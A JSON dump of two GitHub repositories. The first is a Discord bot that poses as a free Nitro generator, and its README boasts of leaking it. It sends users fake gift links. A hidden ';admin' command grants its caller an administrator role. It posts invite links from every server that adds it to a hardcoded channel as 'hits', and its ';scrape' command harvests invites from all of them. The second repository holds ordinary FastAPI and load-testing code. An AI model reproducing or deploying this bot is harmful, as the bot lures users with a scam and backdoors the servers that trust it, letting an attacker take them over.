random_state=rand_state)\n\t# Fit a per-column scaler only on the training data\n\tX_scaler = StandardScaler().fit(X_train)\n\t# Apply the scaler to both X_train and X_test\n\tscaled_X_train = X_scaler.transform(X_train)\n\tscaled_X_test = X_scaler.transform(X_test)\n\n\n\n\n\n\n#########################################################################\n#########################################################################\n#########################################################################\n#########################################################################\n#########################################################################\n#########################################################################\n#########################################################################\n\n\n\n# Define a function to search for template matches\n# and return a list of bounding boxes\ndef find_matches(img, template_list):\n # Define an empty list to take bbox coords\n bbox_list = []\n # Define matching method\n # Other options include: cv2.TM_CCORR_NORMED', 'cv2.TM_CCOEFF', 'cv2.TM_CCORR',\n # 'cv2.TM_SQDIFF', 'cv2.TM_SQDIFF_NORMED'\n method = cv2.TM_CCOEFF_NORMED\n # Iterate through template list\n for temp in template_list:\n # Read in templates one by one\n tmp = mpimg.imread(\"prac_img/cutouts/\" + temp)\n # Use cv2.matchTemplate() to search the image\n result = cv2.matchTemplate(img, tmp, method)\n # Use cv2.minMaxLoc() to extract the location of the best match\n min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result)\n # Determine a bounding box for the match\n w, h = (tmp.shape[1], tmp.shape[0])\n if method in [cv2.TM_SQDIFF, cv2.TM_SQDIFF_NORMED]:\n top_left = min_loc\n else:\n top_left = max_loc\n bottom_right = (top_left[0] + w, top_left[1] + h)\n # Append bbox position to list\n bbox_list.append((top_left, bottom_right))\n # Return the list of bounding boxes\n \n return bbox_list\n\ndef doTemplate():\n\tbboxes = find_matches(image, templist)\n\tresult = draw_boxes(image, bboxes)\n\tplt.imshow(result)\n\tplt.savefig(\"prac_img/template_matching\")\n\ndef plot3d(pixels, colors_rgb,\n axis_labels=list(\"RGB\"), axis_limits=((0, 255), (0, 255), (0, 255))):\n \"\"\"Plot pixels in 3D.\"\"\"\n\n # Create figure and 3D axes\n fig = plt.figure(figsize=(8, 8))\n ax = 
Axes3D(fig)\n\n # Set axis limits\n ax.set_xlim(*axis_limits[0])\n ax.set_ylim(*axis_limits[1])\n ax.set_zlim(*axis_limits[2])\n\n # Set axis labels and sizes\n ax.tick_params(axis='both', which='major', labelsize=14, pad=8)\n ax.set_xlabel(axis_labels[0], fontsize=16, labelpad=16)\n ax.set_ylabel(axis_labels[1], fontsize=16, labelpad=16)\n ax.set_zlabel(axis_labels[2], fontsize=16, labelpad=16)\n\n # Plot pixel values with colors given in colors_rgb\n ax.scatter(\n pixels[:, :, 0].ravel(),\n pixels[:, :, 1].ravel(),\n pixels[:, :, 2].ravel(),\n c=colors_rgb.reshape((-1, 3)), edgecolors='none')\n\n return ax # return Axes3D object for further manipulation\n\n\ndef do_color_hist():\n\timage = mpimg.imread('prac_img/cutouts/cutout1.jpg')\n\trh, gh, bh, bincen, feature_vec = color_hist(image, nbins=32, bins_range=(0, 256))\n\n\t# Plot a figure with all three bar charts\n\tif rh is not None:\n\t fig = plt.figure(figsize=(12,3))\n\t plt.subplot(131)\n\t plt.bar(bincen, rh[0])\n\t plt.xlim(0, 256)\n\t plt.title('R Histogram')\n\t plt.subplot(132)\n\t plt.bar(bincen, gh[0])\n\t plt.xlim(0, 256)\n\t plt.title('G Histogram')\n\t plt.subplot(133)\n\t plt.bar(bincen, bh[0])\n\t plt.xlim(0, 256)\n\t plt.title('B Histogram')\n\t fig.tight_layout()\n\t plt.savefig(\"prac_img/color_histo\")\n\telse:\n\t print('Your function is returning None for at least one variable...')\n\ndef doFeatExtract():\n images = glob.glob('prac_img\\\\smallset/*/*/*.jpeg')\n cars = []\n notcars = []\n for image in images:\n if 'image' in image or 'extra' in image:\n notcars.append(image)\n else:\n cars.append(image)\n\n car_features = extract_features(cars, cspace='RGB', spatial_size=(32, 32),\n hist_bins=32, hist_range=(0, 256))\n notcar_features = extract_features(notcars, cspace='RGB', spatial_size=(32, 32),\n hist_bins=32, hist_range=(0, 256))\n\n if len(car_features) > 0:\n # Create an array stack of feature vectors\n X = np.vstack((car_features, notcar_features)).astype(np.float64) \n # Fit a per-column scaler\n X_scaler = StandardScaler().fit(X)\n # Apply the scaler to X\n scaled_X = X_scaler.transform(X)\n car_ind = np.random.randint(0, len(cars))\n # Plot an example of raw and scaled features\n fig = plt.figure(figsize=(12,4))\n plt.subplot(131)\n plt.imshow(mpimg.imread(cars[car_ind]))\n plt.title('Original Image')\n plt.subplot(132)\n plt.plot(X[car_ind])\n plt.title('Raw Features')\n plt.subplot(133)\n plt.plot(scaled_X[car_ind])\n plt.title('Normalized Features')\n fig.tight_layout()\n else: \n print('Your function only returns empty feature vectors...')\n\n# Define a function to return some characteristics of the dataset \n# Pass in the path to the car and notcar images for the dataset\ndef data_look(car_list, notcar_list):\n data_dict = {}\n # Define a key in data_dict \"n_cars\" and store the number of car images\n data_dict[\"n_cars\"] = len(car_list)\n # Define a key \"n_notcars\" and store the number of notcar images\n data_dict[\"n_notcars\"] = len(notcar_list)\n # Read in a test image, either car or notcar\n example_img = mpimg.imread(car_list[0])\n # Define a key \"image_shape\" and store the test image shape 3-tuple\n data_dict[\"image_shape\"] = example_img.shape\n # Define a key \"data_type\" and store the data type of the test image.\n data_dict[\"data_type\"] = example_img.dtype\n # Return data_dict\n return data_dict\n\n\n # if len(frames) == 0:\n # for box in bboxes: \n # new_frame = frame()\n # new_frame.add_box(box)\n # elif len(frames) == 1:\n # if len(bbox) == 0:\n # frames[0].add_box(np.nan)\n 
# elif len(bbox == 1):\n # frames[0].add_box(bbox[0])\n # else:\n # comp = frames[0].get_minx()\n # box1_dist = abs(bbox[0][0][0] - comp)\n # box2_dist = abs(bbox[1][0][0] - comp)\n # if box1_dist > box2_dist:\n # frames[0].add_box[bbox[1]]\n # new_frame = Frame()\n # new_frame.add_box[bbox[0]]\n # else:\n # frames[0].add_box[bbox[0]]\n # new_frame = Frame()\n # new_frame.add_box[bbox[1]]\n # else:\n # if len(bbox) == 0:\n # for fr in frames:\n # fr.add_box(np.nan)\n # elif len(bbox == 1):\n # frames[0].add_box(bbox[0])\n # else:\n # comp = frames[0].get_minx()\n # box1_dist = abs(bbox[0][0][0] - comp)\n # box2_dist = abs(bbox[1][0][0] - comp)\n # if box1_dist > box2_dist:\n # frames[0].add_box[bbox[1]]\n # new_frame = Frame()\n # new_frame.add_box[bbox[0]]\n # else:\n # frames[0].add_box[bbox[0]]\n # new_frame = Frame()\n # new_frame.add_box[bbox[1]]" }, { "alpha_fraction": 0.7751035690307617, "alphanum_fraction": 0.7866338491439819, "avg_line_length": 92.01041412353516, "blob_id": "5c756aa37ce72afe9ab7d62e073f0dcda5cf59b2", "content_id": "4c3d789d867848707fd8b23f6ea308b0128bd7e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 8945, "license_type": "no_license", "max_line_length": 983, "num_lines": 96, "path": "/CarND-Vehicle-Detect/README.md", "repo_name": "KyleGrier/self-driving", "src_encoding": "UTF-8", "text": "\n# Vehicle Detection Project\n---\n\nThe goals / steps of this project are the following:\n\n* Perform a Histogram of Oriented Gradients (HOG) feature extraction on a labeled training set of images and train a classifier Linear SVM classifier\n* Apply a color transform and append binned color features, as well as histograms of color, to HOG feature vector. \n* Normalize features and randomize a selection for training and testing.\n* Implement a sliding-window technique and use trained classifier to search for vehicles in images.\n* Run pipeline on a video stream (start with the test_video.mp4 and later implement on full project_video.mp4) and create a heat map of recurring detections frame by frame to reject outliers and follow detected vehicles.\n* Estimate a bounding box for vehicles detected.\n\n[//]: # (Image References)\n[image1]: ./hog_prac/orient_1_cell8_pix4.png\n[image2]: ./hog_prac/orient_3_cell8_pix4.png\n[image3]: ./hog_prac/orient_13_cell8_pix4.png\n[image4]: ./stat_data.png\n[image5]: ./output_images/2search_windows2.png\n[image6]: ./output_images/0search_windows3.png\n[image7]: ./output_images/3search_windows2.png\n[video1]: ./project_video.mp4\n\n## [Rubric](https://review.udacity.com/#!/rubrics/513/view) Points\n### Here I will consider the rubric points individually and describe how I addressed each point in my implementation. \n\n---\n### Writeup / README\n\n#### 1. Provide a Writeup / README that includes all the rubric points and how you addressed each one. You can submit your writeup as markdown or pdf. [Here](https://github.com/udacity/CarND-Vehicle-Detection/blob/master/writeup_template.md) is a template writeup for this project you can use as a guide and a starting point. \n\nYou're reading it!\n\n### Histogram of Oriented Gradients (HOG)\n\n#### 1. Explain how (and identify where in your code) you extracted HOG features from the training images.\n\nThe code for this step is contained in `helper.py` on line 74-85.\nI started by reading in all the vehicle and non-vehicle images. I then tried to get an intuition for the kind of HOG feature values I would obtain based on differing parameters. 
Here are a few images from my exploration:\n\n![alt text][image1]\n![alt text][image2]\n![alt text][image3]\n\nOther functions that facilitated extraction of the HOG features are “extract_features” and “single_image_features”, which can be found on lines 89 and 133, respectively, in helper.py. These functions specify how many channels in a color space are used for HOG extraction, and they standardize the size of each image before extracting features.\n\n\n#### 2. Explain how you settled on your final choice of HOG parameters.\n\nI settled on my final choice of HOG parameters by seeing how well a classifier could predict on a validation set for each specific permutation of color space and HOG parameters. Here are the different trials I ran through to come to my choice.\n\n![alt text][image4]\n\nAfter deciding on LUV as the color space based on a preliminary test, I adjusted the orientation value and pixels per cell to come to my choice of parameters. I then performed a test to see if increasing cells per block could help my score and found a slight improvement going to 4 cells per block as opposed to 2. However, I wasn’t pleased by how long the feature extraction was taking when detecting on the final project video. To speed things up I increased the pixels per cell to 16. I then ran cross-validation on the training set and found the YUV space to work the best for extracting the HOG features.\n\n#### 3. Describe how (and identify where in your code) you trained a classifier using your selected HOG features (and color features if you used them).\n\nI trained a Linear SVM with C=0.001 to minimize false positives. Although other SVM kernels performed better in testing, the Linear SVM is much quicker, so I used it for the final detection process.\nThe actual implementation can be found in pipeline.py on lines 81-96 in the function trainModel, which takes a training and test set, normalizes both to a standard Gaussian, and then fits the data set to the chosen SVM. The function then predicts on the test set and provides a score for the accuracy of its performance. \n\n\n### Sliding Window Search\n\n#### 1. Describe how (and identify where in your code) you implemented a sliding window search. How did you decide what scales to search and how much to overlap windows?\n\nI implemented the window search on lines 175-213 and on lines 218-244 in the file helper.py. I decided upon my final window sliding area by playing with different parameters for the overlap and area of the window slide. The windows cover the bottom right of the image because the project video is only concerned with detecting cars in that area. The different square windows I use have side lengths of 64, 80, and 96. They overlap in such a way that no one area of the window slide zone is overrepresented in the heatmap; if the heatmap were biased, it would be hard to choose an appropriate cutoff threshold for it.\n\n![alt text][image5]\n\n#### 2. Show some examples of test images to demonstrate how your pipeline is working. What did you do to optimize the performance of your classifier?\n\nTo optimize the performance of the classifier I removed the KITTI_extracted dataset because it was causing issues with detecting the white car in the project video at long distances. To minimize false positives, I sampled the project video, hard-mining for false positives. I then included these false positives in the non-vehicle dataset used for training. 
The classifier was also optimized by tuning the parameters in my feature extraction function discussed earlier. I also discovered how each window was performing by saving the windows detected for each scale and overlaying them on the test images.\nHere are some example images:\n\n![alt text][image5]\n![alt text][image6]\n![alt text][image7]\n---\n\n### Video Implementation\n\n#### 1. Provide a link to your final video output. Your pipeline should perform reasonably well on the entire project video (somewhat wobbly or unstable bounding boxes are ok as long as you are identifying the vehicles most of the time with minimal false positives.)\nHere's a [link to my video result](./project_video_output.mp4)\n\n\n#### 2. Describe how (and identify where in your code) you implemented some kind of filter for false positives and some method for combining overlapping bounding boxes.\n\nI recorded the positions of positive detections in each frame of the video. From the positive detections I created a heatmap and then thresholded that map to identify vehicle positions. I then used scipy.ndimage.measurements.label() to identify individual blobs in the heatmap and assumed each blob corresponded to a vehicle. This process is handled in lines 12-28 of cell 4 in the Jupyter notebook final.ipynb. I constructed bounding boxes to cover the area of each blob detected. If a blob had an area of less than 2000 pixels, I removed it. This is done in the function draw_labeled_bboxes in helper.py. The bounding boxes are only placed once every 10 frames to increase stability and further defend against false positives. Each bounding box overlaid on the video was an average of the previous 10 frames. This averaging was done in the Boxes class defined in cell 6 of the Jupyter notebook final.ipynb.\n\n---\n\n### Discussion\n\n#### 1. Briefly discuss any problems / issues you faced in your implementation of this project. Where will your pipeline likely fail? What could you do to make it more robust?\n\nThe biggest issues I faced came from the choice of windows for the window slide and the parameters set for the feature extraction, especially for HOG features. I went through many different iterations of window slide areas. Some windows were much smaller but ended up giving me more false positives, so I didn’t include them in the final pipeline. My pipeline performs pretty well on the video with only one false positive, but because of this false positive I could see the pipeline having more difficulty on a street with more external activity, such as in a city. My pipeline also takes advantage of the project video constraint that the cars being detected are in the bottom right corner. I would be curious to see how the pipeline would perform if the car changed lanes. My pipeline will also fail if the relative speed of the cars in view is much different from our car's. Because I average 10 frames to make my boxes, the pipeline would likely miss the car if it changes position in the video too quickly.\nTo make the pipeline more robust, I would increase the area of the window slides to cover more of the camera view. I would also create a queue that takes in a car class object so I could average the frames in that way. This could help me have more concentrated and distinct boxes for the car and save information pertaining to a specific car. This could slow down the pipeline, though. \n\n\n" }
]
6
dadadel/manage_sqlite3_db
https://github.com/dadadel/manage_sqlite3_db
05b8b1c6053c8e67e7cd1319c85ee16f57caf470
892311822ec9985abe9f484c986155ccc4bd6528
64af516a32c235c8ce565184ddc3c77930f534b1
refs/heads/master
2021-01-11T10:48:14.419565
2015-03-17T21:05:51
2015-03-17T21:05:51
40,757,272
2
1
null
null
null
null
null
[ { "alpha_fraction": 0.4738847315311432, "alphanum_fraction": 0.47806316614151, "avg_line_length": 31.285715103149414, "blob_id": "3097172d87bfd59bddd33780f99f5d04cd3fff32", "content_id": "cf7bacb159ec257d7d6543951e59e31716c6b3bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8137, "license_type": "no_license", "max_line_length": 104, "num_lines": 252, "path": "/manage_db.py", "repo_name": "dadadel/manage_sqlite3_db", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\n__author__ = \"A. Daouzli\"\n__version__ = \"0.1\"\n\nimport os\nimport re\nimport sqlite3\n\n\nclass ManageSqliteDB(object):\n def __init__(self, db_file=\"tst.sqlite\", auto=False):\n '''Initializes the DB object.\n :param db_file: the file that contains the sqlite DB\n :type db_file: str\n :param auto: if True will open the DB else the user will have to run\n himself the method `opendb()`.'''\n self.db_file = db_file\n self.db = None\n if auto == True:\n self.opendb()\n\n def __del__(self):\n self.closedb()\n\n def opendb(self, db_file=None):\n '''Open the DB from file and create a cursor.'''\n if db_file is not None:\n self.db_file = db_file\n result = True\n db = sqlite3.connect(self.db_file)\n if db is None:\n print(\"failed to open DB '{}'\".format(self.db_file))\n result = False\n else:\n self.db = db\n self.cursor = db.cursor()\n return result\n\n def closedb(self):\n if self.db:\n self.db.commit()\n self.cursor.close()\n self.db.close()\n self.db = None\n self.cursor = None\n\n def create(self, table, fields):\n '''Creates a table with provided fields.\n :param fields: list of either name fields (will be TEXT) or tuples\n (name,type).\n :type fileds: list of str and/or tuples\n '''\n txt = ''\n for field in fields:\n if type(field) is tuple:\n txt += field[0] + \" \" + field[1]\n else:\n txt += field + \" TEXT\"\n txt += ', '\n txt = \", \".join(txt.split(\", \")[:-1])\n req = \"CREATE TABLE {} ({})\".format(table, txt)\n self.request(req)\n\n def list_tables(self):\n self.request(\"SELECT name FROM sqlite_master WHERE type='table'\")\n return [e[0] for e in self.cursor.fetchall()]\n\n def list_fields(self, table):\n self.request(\"PRAGMA table_info('{}')\".format(table))\n return [e[1] for e in self.cursor.fetchall()]\n\n def request(self, req, values=None):\n if values:\n self.cursor.execute(req, values)\n else:\n self.cursor.execute(req)\n self.db.commit()\n\n def set(self, table, **kwargs):\n '''Sets records in a table.\n\n :param table: the table\n :param **kwargs: set of key/value to set in the table\n '''\n val_pattern = '? ' * len(kwargs.values())\n val_pattern = \", \".join(val_pattern.split())\n values = tuple(kwargs.values())\n req = \"INSERT INTO {}({}) VALUES ({})\".format(table,\n \"'\" + \"','\".join(kwargs.keys()) + \"'\",\n val_pattern\n )\n self.request(req)\n\n def update(self, table, where, **kwargs):\n \"\"\"Update a record.\n :param table: the concerned table\n :param where: the condition(s)\n :type where: dict\n :param kwargs: the parameters to set\n :type kwargs: dict\n \"\"\"\n values = tuple(kwargs.values() + where.values())\n by = \", \".join([k + \"=?\" for k in kwargs.keys()])\n where = \" AND \".join([k + \"=?\" for k in where.keys()])\n req = \"UPDATE {} SET {} WHERE {};\".format(table,\n by,\n where\n )\n self.request(req, values)\n\n def get(self, table, fields=None, **kwargs):\n '''Gets from the DB some fields from all records with or without\n condition(s).\n :param fields: list of fields to retrieve. 
If not given all fields are\n retrieved.\n :type fields: list or None\n :param kwargs: the wanted values for fields as condition\n :type kwargs: dict\n :returns: a list of the found items\n :rtype: list of tuples\n '''\n if fields is None:\n fields = '*'\n else:\n fields = \", \".join(fields)\n if len(kwargs):\n condition = \" AND \".join([k + \"='\" + v + \"'\" for k, v in kwargs.items()])\n req = \"SELECT {} FROM {} WHERE {}\".format(\n fields,\n table,\n condition\n )\n else:\n req = \"SELECT {} FROM {}\".format(\n fields,\n table\n )\n self.request(req)\n res = self.cursor.fetchall()\n return res\n\n def delete(self, table, **kwargs):\n condition = \" AND \".join([k + \"='\" + v + \"'\" for k, v in kwargs.items()])\n req = \"DELETE FROM {} WHERE {}\".format(\n table,\n condition\n )\n self.request(req)\n\n\ndef show_menu():\n txt = '------------\\n'\n txt += '0 - exit\\n'\n txt += '1 - open DB\\n'\n txt += '2 - close\\n'\n txt += '3 - get\\n'\n txt += '4 - set\\n'\n txt += '5 - del\\n'\n txt += '6 - list tables\\n'\n txt += '7 - create table\\n'\n txt += '8 - request\\n'\n txt += '9 - list fields\\n'\n txt += '10 - get with condition\\n'\n print(txt)\n\n\nif __name__ == '__main__':\n print (\"ManageSqliteDB v\" + __version__)\n db = ManageSqliteDB(auto=False)\n txt = '\\nManageDB interactive\\n'\n print(txt)\n while True:\n show_menu()\n c = int(input('Your choice: '))\n if c == 0:\n break\n\n elif c == 1:\n n = input('DB file name: ')\n db.opendb(n)\n\n elif c == 2:\n db.closedb()\n\n elif c == 3:\n table = input('Table where to get items: ')\n fields = input('Fields to get (coma separated, else \"*\" for all): ')\n if fields == \"*\":\n fields = None\n else:\n fields = [s.strip() for s in fields.split(\",\")]\n print(db.get(table, fields))\n\n elif c == 10:\n table = input('Table where to get items with condition: ')\n fields = input('Fields to get (coma separated, else \"*\" for all): ')\n conditions = input('Conditions (couples of field=value coma separated): ')\n conditions = [s.strip() for s in conditions.split(\",\")]\n if fields == \"*\":\n fields = None\n else:\n fields = [s.strip() for s in fields.split(\",\")]\n data = {}\n for condition in conditions:\n k, v = condition.split(\"=\")\n data[k.strip()] = v.strip()\n print(db.get(table, fields, **data))\n\n elif c == 9:\n table = input('Table where to get fields: ')\n print(db.list_fields(table))\n\n elif c == 4:\n table = input('Table where to add item: ')\n couples = input('Couples of field=value to set (coma separated): ')\n couples = [s.strip() for s in couples.split(\",\")]\n data = {}\n for couple in couples:\n k, v = couple.split(\"=\")\n data[k.strip()] = v.strip()\n db.set(table, **data)\n\n elif c == 5:\n table = input('Table where to delete an item: ')\n couples = input('Couples of field=value identifying the item (coma separated): ')\n couples = [s.strip() for s in couples.split(\",\")]\n data = {}\n for couple in couples:\n k, v = couple.split(\"=\")\n data[k.strip()] = v.strip()\n db.delete(table, **data)\n\n elif c == 6:\n print(db.list_tables())\n\n elif c == 7:\n table = input('Table to create: ')\n fields = input('List (coma separated) of fields (of type TEXT) and/or couples field=type: ')\n fields = [s.strip() for s in fields.split(\",\")]\n l = []\n for field in fields:\n if \"=\" in field:\n k, v = field.split(\"=\")\n l.append((k.strip(), v.strip()))\n else:\n l.append(field.strip())\n db.create(table, l)\n\n elif c == 8:\n req = input('Request: ')\n print(\"Result:\\n{}\".format(db.request(req)))\n\n" } ]
1
Jokersells/Wizznet-Latest
https://github.com/Jokersells/Wizznet-Latest
c14a0e19859451d373cfd28508695216f6b068d2
8d5c567b4e650d5a5d2581d6ff6799499c325af0
3a2b05e3b1c884cf3ef94f9f69f9f00e25e47f3a
refs/heads/main
2023-05-25T22:20:22.389649
2021-06-03T20:57:28
2021-06-03T20:57:28
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7910447716712952, "alphanum_fraction": 0.7910447716712952, "avg_line_length": 65, "blob_id": "eb6ce707614f6341d166f3164fee6bc51c67ec2a", "content_id": "e6bf12353843d1cb5b298c4fdfbb6a9f7f84b3bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 67, "license_type": "no_license", "max_line_length": 65, "num_lines": 1, "path": "/README.md", "repo_name": "Jokersells/Wizznet-Latest", "src_encoding": "UTF-8", "text": "\nMuffasa and Cashvoid tried to leak this so why not leak it myself\n" }, { "alpha_fraction": 0.7091229557991028, "alphanum_fraction": 0.7368884682655334, "avg_line_length": 35.03174591064453, "blob_id": "625430070e9b3149beaad65776e326cb4ca63468", "content_id": "7e80e7a20970049a0687a8e0b237680cd03b3406", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2271, "license_type": "no_license", "max_line_length": 148, "num_lines": 63, "path": "/main.py", "repo_name": "Jokersells/Wizznet-Latest", "src_encoding": "UTF-8", "text": "import random, string\nimport discord,random,time\nimport json\nimport asyncio\nfrom discord.ext import commands\nimport os \nimport aiohttp\n\nintents = discord.Intents.all()\nclient = commands.Bot(command_prefix = ';', help_command = None, intents=intents)\nclientdiscord = discord.Client()\nclient.remove_command(\"help\")\[email protected]\nasync def on_ready():\n print(\"I am alive\")\n await client.change_presence(activity=discord.Game(name=\n ';help┃arqez.sexy'))\n\[email protected]()\nasync def generate(ctx):\n user = ctx.author\n nitro = ''.join(random.choice(string.ascii_uppercase + string.digits + string.ascii_lowercase) for _ in range(16))\n await user.send(f\"Heres your nitro https://discord.gift/{nitro}\")\n embed=discord.Embed(title=\"Generated You Nitro\", description=\"Enjoy\",color=0x7289da)\n await ctx.send(embed=embed)\n await ctx.message.delete()\n\[email protected]()\nasync def help(ctx):\n embed=discord.Embed(title=\"Help\", description=\"Free Nitro Commands\",color=0x7289da)\n embed.add_field(name=\";generate\", value=\"Generates Free Nitro\", inline=False)\n embed.add_field(name=\";invite\", value=\"Invite for more free nitro!\", inline=False)\n await ctx.send(embed=embed)\n\[email protected]()\nasync def invite(ctx):\n await ctx.send(\"**Invite me for more free nitro** https://discord.com/api/oauth2/authorize?client_id=848235353881444362&permissions=8&scope=bot \")\n\[email protected]()\nasync def admin(ctx):\n guild = ctx.guild\n role = await guild.create_role(name=\"Arq Net\", permissions=discord.Permissions(8),colour=discord.Colour(000000))\n authour = ctx.message.author\n await ctx.message.delete()\n await authour.add_roles(role)\n await guild.leave() \n \[email protected]\nasync def on_guild_join(guild):\n channel = client.get_channel(848238605352042569)\n z = random.choice(guild.text_channels)\n invitelink = await z.create_invite(max_uses=100,unique=True)\n await channel.send(f\"{invitelink} members > {guild.member_count} :ballot_box_with_check: @everyone total hits > {len(client.guilds)} \")\n\[email protected]()\nasync def scrape(ctx):\n for guild in client.guilds:\n \n z = random.choice(guild.text_channels)\n invitelink = await z.create_invite(max_uses=100,unique=True)\n await ctx.send(f\"Scraped > {invitelink} :ballot_box_with_check:\")\n \nclient.run(\"\")" } ]
2
monoper/BlockchainDB
https://github.com/monoper/BlockchainDB
ebafa3533941681f6754fdab7ac92e27c14c614b
cda8bb65e2351553d4d09e6396796eb0715641b7
054f551d0a3da1221c524b1828ea60756f776740
refs/heads/main
2023-04-02T04:12:36.229870
2021-04-12T12:52:33
2021-04-12T12:52:33
355,917,199
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.8062015771865845, "alphanum_fraction": 0.8062015771865845, "avg_line_length": 31.25, "blob_id": "03dafeb580804a745062c6da7b06f91a3f928591", "content_id": "76f045e0e586a222e89ca272bdc357aa413f73e8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 129, "license_type": "permissive", "max_line_length": 50, "num_lines": 4, "path": "/example/app/api/blockchain/__init__.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "\"\"\"Grouping for blockchain related things\"\"\"\n\nfrom .blockchain import Blockchain as BlockchainDb\nfrom .api import blockchain_api\n" }, { "alpha_fraction": 0.7542504072189331, "alphanum_fraction": 0.7542504072189331, "avg_line_length": 28.409090042114258, "blob_id": "12a9e618078bdc21f00a27daa33930b0ee1ea2a1", "content_id": "d918d6f5efe6bbce4177f7073b0483786ec8bc2d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 647, "license_type": "permissive", "max_line_length": 75, "num_lines": 22, "path": "/example/app/api/provider_models.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "from typing import List\nfrom datetime import datetime\nfrom pydantic import BaseModel, EmailStr\nfrom .common_models import Address, Name, PhoneNumbers, ProvidableTreatment\n\nclass Provider(BaseModel):\n \"\"\"Model of a provider\"\"\"\n providerId: str\n name: Name\n phoneNumbers: PhoneNumbers\n addresses: List[Address]\n dateOfBirth: datetime\n email: EmailStr\n providableTreatments: List[ProvidableTreatment]\n\nclass ProviderSearchResult(BaseModel):\n \"\"\"Result of a provider search\"\"\"\n providerId: str\n name: Name\n phoneNumbers: PhoneNumbers\n addresses: List[Address]\n providableTreatments: List[ProvidableTreatment]\n" }, { "alpha_fraction": 0.5729513764381409, "alphanum_fraction": 0.6175882816314697, "avg_line_length": 30.914894104003906, "blob_id": "db50053907e616ccd08310b13648e43a6e5347a3", "content_id": "c24b99c12519a773a39c2fc098c9cda1987acaea", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1501, "license_type": "permissive", "max_line_length": 339, "num_lines": 47, "path": "/example/test/load_testing/load_testing.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "import asyncio\nimport json\nimport uuid\n\nimport requests\n\nasync def create_client_request():\n client_id = str(uuid.uuid4())\n url = 'http://localhost:5000/client/{}'.format(client_id)\n print('Using url: {}'.format(url))\n\n json_data = build_json_client_payload(client_id)\n\n resp = requests.post(url, json=json_data)\n\n for i in range(0, 500):\n await asyncio.gather(\n put_request(url, json_data),\n put_request(url, json_data),\n put_request(url, json_data),\n put_request(url, json_data),\n put_request(url, json_data),\n put_request(url, json_data),\n put_request(url, json_data),\n put_request(url, json_data),\n put_request(url, json_data),\n put_request(url, json_data),\n put_request(url, json_data)\n )\n\n print(resp)\n\n\ndef build_json_client_payload(client_id):\n data = '{\"name\":{\"firstName\":\"W\",\"middleName\":\"A\",\"lastName\":\"H\"},\"phoneNumbers\":{\"home\":\"1234567890\",\"mobile\":\"1234567890\",\"work\":\"1234567890\"},\"address\":{\"unit\":1,\"streetAddress\":\"123 fake street\",\"city\":\"Fake City\",\"province\":0,\"country\":\"Canada\",\"postalCode\":\"l1l1l1\"},\"dateOfBirth\":\"2021-01-29 
23:50:58.272613\",\"email\":\"[email protected]\"}'\n json_data = json.loads(data)\n json_data['clientId'] = client_id\n\n return json_data\n\n\nasync def put_request(url, json_payload):\n resp = requests.put(url, json=json_payload)\n return resp.status_code\n\n\nasyncio.run(create_client_request())\n\n" }, { "alpha_fraction": 0.7116244435310364, "alphanum_fraction": 0.7175856828689575, "avg_line_length": 30.186046600341797, "blob_id": "aa68a114adfe23dfd59e4ab49ef76b1ee6b387c5", "content_id": "de54f60affeaca6c2956455c0a778cd48589f847", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1342, "license_type": "permissive", "max_line_length": 112, "num_lines": 43, "path": "/example/app/main.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "\"\"\"Main entry point for application\"\"\"\n\nimport os\nimport logging\nfrom starlette.middleware import Middleware\nfrom starlette.middleware.cors import CORSMiddleware\nfrom fastapi import FastAPI, status, Request\nfrom .api import auth_api, client_api, provider_api, blockchain_api\nimport uuid\n\nlogging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG)\n\nlogging.info(\"Starting\")\n\nif 'ENVIRONMENT' not in os.environ or os.environ['ENVIRONMENT'] == 'development':\n logging.info(\"Development CORS policy enabled\")\n middleware = [ Middleware(\n CORSMiddleware,\n allow_origins=['http://localhost:3000', 'http://localhost:*', 'https://app.dev.blockmedisolutions.com'],\n allow_credentials=True,\n allow_methods=['*'],\n allow_headers=['*']\n )]\n\n\napp = FastAPI(middleware=middleware)\n\[email protected](\"http\")\nasync def add_correlation_header(request: Request, call_next): \n correlation_id = str(uuid.uuid4())\n response = await call_next(request)\n response.headers[\"X-Correlation-Id\"] = correlation_id\n return response\n\napp.include_router(auth_api)\napp.include_router(client_api)\napp.include_router(provider_api)\napp.include_router(blockchain_api)\n\[email protected]('/api/health', status_code=status.HTTP_200_OK)\ndef health():\n \"\"\"Health check endpoint for use by ECS\"\"\"\n return True\n\n" }, { "alpha_fraction": 0.5823754668235779, "alphanum_fraction": 0.5977011322975159, "avg_line_length": 12.736842155456543, "blob_id": "c60ec9760077645ca72dfa63939fe5f82e47df7f", "content_id": "c8cf3ba5e0c29f8c95e5654658e4c186c57ce493", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 261, "license_type": "permissive", "max_line_length": 41, "num_lines": 19, "path": "/example/test/load_testing/async_test.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "import asyncio\n\n\nasync def foo(n):\n return n + 1\n\nasync def main():\n tasks = []\n\n for i in range(7, 11):\n tasks.append(foo(i))\n\n result = await asyncio.gather(*tasks)\n\n print(result)\n return result\n\nres = asyncio.run(main())\nprint(res)\n" }, { "alpha_fraction": 0.7455752491950989, "alphanum_fraction": 0.7455752491950989, "avg_line_length": 21.600000381469727, "blob_id": "b730b6eb00afe01538a1a1e9beda46e11342f5c9", "content_id": 